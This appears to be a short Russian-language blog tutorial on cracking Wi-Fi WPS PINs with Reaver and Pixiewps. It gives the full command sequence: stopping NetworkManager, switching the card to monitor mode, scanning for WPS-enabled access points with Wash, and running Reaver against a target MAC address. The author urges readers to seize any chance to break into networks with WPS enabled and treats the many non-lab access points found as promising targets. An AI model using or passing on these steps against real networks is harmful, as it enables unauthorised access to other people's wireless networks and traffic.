Взлом WPS с Reaver

Как и WEP, WPS хоть и поддерживается большинством Wi-Fi оборудования, но всё реже и реже можно найти точку доступа, где бы он был включён. Тем не менее, такие ТД попадаются и не нужно упускать свой шанс быстро взломать Wi-Fi!

Начать нужно с проверки, включён ли на атакуемой беспроводной точке доступа WPS. Это можно сделать несколькими способами, подробности смотрите в разделе «Поиск беспроводных точек доступа с включённым WPS: использование программ Wash, Airodump-ng и Wifite». Я буду использовать Wash.

Начинаем с отключения NetworkManager. В Kali Linux:

1
sudo service NetworkManager stop

В BlackArch:

1
sudo systemctl stop NetworkManager

Переводим беспроводную карту в режим монитора:

1
t=`iw dev | grep 'Interface' | sed 's/Interface //'`;sudo ip link set $t down && sudo iw $t set monitor control && sudo ip link set $t up

Запускаем Wash (вместо wlp2s0 укажите имя вашего беспроводного интерфейса, узнать которое можно по команде iw dev):

1
sudo wash -i wlp2s0

006

На мой взгляд, результат очень хороший (там только две лабораторные ТД) — достаточно много точек доступа с активным WPS.

При запуске Reaver нам нужно использовать ключ -i, после которого указать имя беспроводного интерфейса, ключ -b, после которого указать MAC атакуемой ТД. Можно добавить ключ -v или даже -vv — они увеличивают вербальность, т. е. количество показываемой информации. Также для применения Pixiewps укажите ключ -K 1.

Допустим, я атакую ТД 20:25:64:16:58:8C, тогда команда в моём случае приобретает вид:

1
sudo reaver -i wlp2s0 -b 20:25:64:16:58:8C -vv -K 1

Если Pixiewps не помогла, то запускайте аналогичную команду, но без ключа -K 1.

008

  • Автор: makar
  • Комментарии: 0
  • Просмотры: 697
2

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!